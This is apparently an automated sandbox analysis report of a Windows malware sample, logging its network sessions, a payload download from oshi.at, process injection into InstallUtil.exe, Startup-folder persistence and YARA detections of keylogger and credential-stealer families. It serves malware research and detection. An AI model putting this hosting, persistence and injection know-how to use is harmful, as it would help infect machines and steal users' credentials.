                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca1yoTqK%2BB9gchVuv%2F2xBNQUAn%2FB7isStP7%2FPYYrGbhMHu79KlPWCKuyoglQo5ZWAoqP5FzGBLkh13GikP8QzzFSdZGqdWY6PbM0CZwBj%2FSMzUREkQH1m3Tk%2FYeliMPVFZ8Pa7D4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ec432cd0ced4370-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1760&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1593886&cwnd=231&unsent_bytes=0&cid=99a62bbe100a239d&ts=469&x=0"
2024-12-03 14:20:37 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49738 | 194.15.112.248 | 443 | 5704 | C:\Users\user\AppData\Roaming\vdvfyt.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:20:44 UTC | 61 | OUT | GET /RMDT HTTP/1.1
                                                                                                                                Host: oshi.at
                                                                                                                                Connection: Keep-Alive
2024-12-03 14:20:44 UTC | 316 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:44 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 943112
                                                                                                                                Connection: close
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 21:48:59 GMT
                                                                                                                                Content-Disposition: attachment; filename=HAeP.dat
                                                                                                                                ETag: "5704373799c6b7660579aea83dd8e3e8"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49780 | 172.67.177.134 | 443 | 4956 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:21:01 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-12-03 14:21:01 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:21:01 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 113084
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TeV9lOz5V3KDHDwR0l7kV16RFJNOen%2FROVel92%2BRRmpAuqHdmRKfIyFFDp%2Brcju%2FeJ3m8mXudgVCpJ3zDHmjN36GJ2q8OT%2FACbCRqq%2BDmdBlDLE8D1wdAUgKIfPa%2B4zsFxNfpK2l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ec43364a9f84255-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1631&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1751649&cwnd=225&unsent_bytes=0&cid=3750a4926382400d&ts=467&x=0"
2024-12-03 14:21:01 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo



                                                                                                                                Target ID:0
                                                                                                                                Start time:09:20:11
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Ref#116670.exe"
                                                                                                                                Imagebase:0xe0000
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5 hash:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2270876798.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:09:20:32
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                Imagebase:0xa00000
                                                                                                                                File size:42'064 bytes
                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3287082945.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3283657783.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:4
                                                                                                                                Start time:09:20:40
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                                                                Imagebase:0x7ff60ab80000
                                                                                                                                File size:170'496 bytes
                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:09:20:40
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                                                                Imagebase:0x5d0000
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5 hash:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2508374788.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 18%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:09:20:57
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                Imagebase:0x5a0000
                                                                                                                                File size:42'064 bytes
                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3286734948.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.5%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.3%
                                                                                                                                  Signature Coverage:14.6%
                                                                                                                                  Total number of Nodes:287
                                                                                                                                  Total number of Limit Nodes:19
5cd7245 CopyFileA 66981->66982 66984 5cd7347 66982->66984 66986 5cd7245 CopyFileA 66985->66986 66988 5cd7347 66986->66988
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-3443518476
                                                                                                                                  • Opcode ID: b1278dc55a4e05b4e8ebd510093a208fd9ca8dcc9e8df0cfd7cca8b5adbe2efa
                                                                                                                                  • Instruction ID: 91685f6610e8a495eb8f164d7df701e517ed38dcf1f401194f4c1d6b83a71626
                                                                                                                                  • Opcode Fuzzy Hash: b1278dc55a4e05b4e8ebd510093a208fd9ca8dcc9e8df0cfd7cca8b5adbe2efa
                                                                                                                                  • Instruction Fuzzy Hash: F3B20274A002288FDB54DFA9C994BADB7B6BF88300F158599E505EF2A5CB70ED81CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-324474496
                                                                                                                                  • Opcode ID: 2119e480ab4b63943a5188de77f2fbe3b39c9a23f2eaa09cf2c1332b397e4e0d
                                                                                                                                  • Instruction ID: bfa6791fa2f2a1b154afdfab9fcf161ecbff63ec54e6685bbd11ba6d599470c3
                                                                                                                                  • Opcode Fuzzy Hash: 2119e480ab4b63943a5188de77f2fbe3b39c9a23f2eaa09cf2c1332b397e4e0d
                                                                                                                                  • Instruction Fuzzy Hash: 4222E834A00228CFDB64DF69C984BADB7B2BF48310F1591A9E509EF2A5DB319D81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                                                                                                  • API String ID: 0-4160082283
                                                                                                                                  • Opcode ID: 9a258e6584ae7b61726bcdeb37104efd24eb01daf05fae4d52a3b98d8807fd7a
                                                                                                                                  • Instruction ID: 50495b8ac5f8ce4feaedb16f11a99258a678f7fc39351662942563a27f04248c
                                                                                                                                  • Opcode Fuzzy Hash: 9a258e6584ae7b61726bcdeb37104efd24eb01daf05fae4d52a3b98d8807fd7a
                                                                                                                                  • Instruction Fuzzy Hash: 1CA2A375A01228CFDB65CF69C984ADDBBB2BF89304F1581E9D509AB325DB319E81CF40

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Pl]q$$]q
                                                                                                                                  • API String ID: 0-2369359564
                                                                                                                                  • Opcode ID: 0f0e9d12d3848c293cf5f9fd61371021fcebc3c438030389763c193376708826
                                                                                                                                  • Instruction ID: 3e458815bcfc27e5cc48d93a5ad9fa05e4afa45fe51e98b43ed16df052cc97dc
                                                                                                                                  • Opcode Fuzzy Hash: 0f0e9d12d3848c293cf5f9fd61371021fcebc3c438030389763c193376708826
                                                                                                                                  • Instruction Fuzzy Hash: 52423834B40204CFDB98EF29C9A4A6A7BF6BF89700B1584A9D506CF365DB35EC41CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fbq$8
                                                                                                                                  • API String ID: 0-3186246319
                                                                                                                                  • Opcode ID: 4caa07a3442d604763f3c6d2b817d2d99c4ad2be54ef268d027e8215b8194c0f
                                                                                                                                  • Instruction ID: 942c683ef5d4dd218c396d74eb0571d58678919111d52d9e098d1d11e64f06ea
                                                                                                                                  • Opcode Fuzzy Hash: 4caa07a3442d604763f3c6d2b817d2d99c4ad2be54ef268d027e8215b8194c0f
                                                                                                                                  • Instruction Fuzzy Hash: FE52D7B5E006298FDB64DF69C950AD9B7B2FF89300F50869AD909B7354DB30AE81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q$ssd
                                                                                                                                  • API String ID: 0-2907924804
                                                                                                                                  • Opcode ID: 6bef5a25540414a2b63dd714b248c854f7cd9cdb9990b310f8fba78b656f06ff
                                                                                                                                  • Instruction ID: e7435c25b68956c122a9be42c204d6423dd899804b30d10a20aae4a35855b8e4
                                                                                                                                  • Opcode Fuzzy Hash: 6bef5a25540414a2b63dd714b248c854f7cd9cdb9990b310f8fba78b656f06ff
                                                                                                                                  • Instruction Fuzzy Hash: 990206B0E05218CFDBA4EF68D844BA9B7F2FB49300F5081AAD549AB355DB305E85CF50

                                                                                                                                  Control-flow Graph (figure not preserved; legend: Executed / Not Executed; graph covers 5cdd159-5cddbd7)
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fbq$h
                                                                                                                                  • API String ID: 0-3598783323
                                                                                                                                  • Opcode ID: d26f41da4190bfe6813ca428c03dfb64d0a8fc271ae5d191f108a30a9c0c3cce
                                                                                                                                  • Instruction ID: 7899c63ab94fcbd90efa9aa9720a21a91f2b5ebb25e0140140665553f6146452
                                                                                                                                  • Opcode Fuzzy Hash: d26f41da4190bfe6813ca428c03dfb64d0a8fc271ae5d191f108a30a9c0c3cce
                                                                                                                                  • Instruction Fuzzy Hash: 5971F7B5E006298BDB64DF69D850BD9B7B2FF89300F50C6AAD509B7254DB306E81CF60
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  • Opcode ID: 0abd979482398db65254e1071f9455ff2f29d36380badf8a80dcc8d4e433c4bd
                                                                                                                                  • Instruction ID: a6c3c328e530220ecdfe38b6f146894b88bd71e09d63fe2515fd3f4b4428da15
                                                                                                                                  • Opcode Fuzzy Hash: 0abd979482398db65254e1071f9455ff2f29d36380badf8a80dcc8d4e433c4bd
                                                                                                                                  • Instruction Fuzzy Hash: AD328870B006198FDB58EF69D5A466EFBF2FF88300F248529D55ADB381CB34A915CB81
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB0371
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 3f89a440ccbbf0afb00d24a91b2a6724c38256b298800c88ffcc7a1b63368c0c
                                                                                                                                  • Instruction ID: e9b8220ea2af0528284474b796712a2cfab56471b4e56d5acaf40a7e4815b0b6
                                                                                                                                  • Opcode Fuzzy Hash: 3f89a440ccbbf0afb00d24a91b2a6724c38256b298800c88ffcc7a1b63368c0c
                                                                                                                                  • Instruction Fuzzy Hash: 8821E4B1D013499FCB10DFAAD984AEEFBF5FF48310F20842AE559A7250C775A940CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB0371
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 90cbe8e1fb638bb1a43e2464a8bac34c34b9ac0cdba53be8350b3312ce5759b1
                                                                                                                                  • Instruction ID: 19af3124eadf517bcb5424b94ccda5d6724c78692edf37a15095cf5cbb6034b9
                                                                                                                                  • Opcode Fuzzy Hash: 90cbe8e1fb638bb1a43e2464a8bac34c34b9ac0cdba53be8350b3312ce5759b1
                                                                                                                                  • Instruction Fuzzy Hash: 7D2103B5D003099FCB10DFAAD985AEEFBF5FF48310F20842AE519A7210C7799940CBA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PH]q
                                                                                                                                  • API String ID: 0-3168235125
                                                                                                                                  • Opcode ID: 7d516e9f9507232813b94a89f030af189a3eb3b2f04bd971bec6212ef96b1a79
                                                                                                                                  • Instruction ID: 9fe862d0fdd447095963ed9ad9eabcb7f6a59808fd1ac53daa14bc69ef51cf0e
                                                                                                                                  • Opcode Fuzzy Hash: 7d516e9f9507232813b94a89f030af189a3eb3b2f04bd971bec6212ef96b1a79
                                                                                                                                  • Instruction Fuzzy Hash: 75D13A74E04318CFEB64EF69E844BADB7F2FB49300F1080A9D549AB296DB705985CF51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PH]q
                                                                                                                                  • API String ID: 0-3168235125
                                                                                                                                  • Opcode ID: 9e7d359f116cb3b48a07cbb3c1b3138ad58727be70f9cb822aefd268b79d6a22
                                                                                                                                  • Instruction ID: 8984aa988cb04c5c063c135b982b26093724e4c3bf88bf18b9dab5f0ba537ca6
                                                                                                                                  • Opcode Fuzzy Hash: 9e7d359f116cb3b48a07cbb3c1b3138ad58727be70f9cb822aefd268b79d6a22
                                                                                                                                  • Instruction Fuzzy Hash: 62D14AB4E04318CFEB64DF69E844BADBBF2FB49300F1080A9D549AB296DB705985CF51
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05CB2896
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 3d850afc6bd45cf79ff0083e683c1c096550a8dd1946bc30d1bfd40b82ae7d72
                                                                                                                                  • Instruction ID: f7554ca88405153039a00a3d0f0edc1e480d3c4f8ef46c107f95958f120f1c12
                                                                                                                                  • Opcode Fuzzy Hash: 3d850afc6bd45cf79ff0083e683c1c096550a8dd1946bc30d1bfd40b82ae7d72
                                                                                                                                  • Instruction Fuzzy Hash: 5111E4B5D002098EDB10DFAAD485AEEFBF4FF49310F50882AD459A7250CB79A945CFA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05CB2896
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: d0871e08c009e5c4f3e644434c03ae6eab4ef7ec20091065f17f6592829b418f
                                                                                                                                  • Instruction ID: 63abf53e085c1517fb475b704420da875c51c7f3dc49ca5a52111d8f3576ecab
                                                                                                                                  • Opcode Fuzzy Hash: d0871e08c009e5c4f3e644434c03ae6eab4ef7ec20091065f17f6592829b418f
                                                                                                                                  • Instruction Fuzzy Hash: 5E1114B5D002098EDB10DFAAD5857EEFBF4FF48310F14882AD459A7240CB79A945CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Ddq
                                                                                                                                  • API String ID: 0-562783569
                                                                                                                                  • Opcode ID: 9f29b2e5647b9c089f66e6ff258561591c5bf166a9b3235e12f249c0221f3302
                                                                                                                                  • Instruction ID: f4541dbffbde448470f6b6c5c2ae47598e65b871ae40a783082ec1171084d608
                                                                                                                                  • Opcode Fuzzy Hash: 9f29b2e5647b9c089f66e6ff258561591c5bf166a9b3235e12f249c0221f3302
                                                                                                                                  • Instruction Fuzzy Hash: F7D1BFB4E00218CFDB54DFA9D994A9DBBF2FF88300F1085A9D419AB365DB30A981CF51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
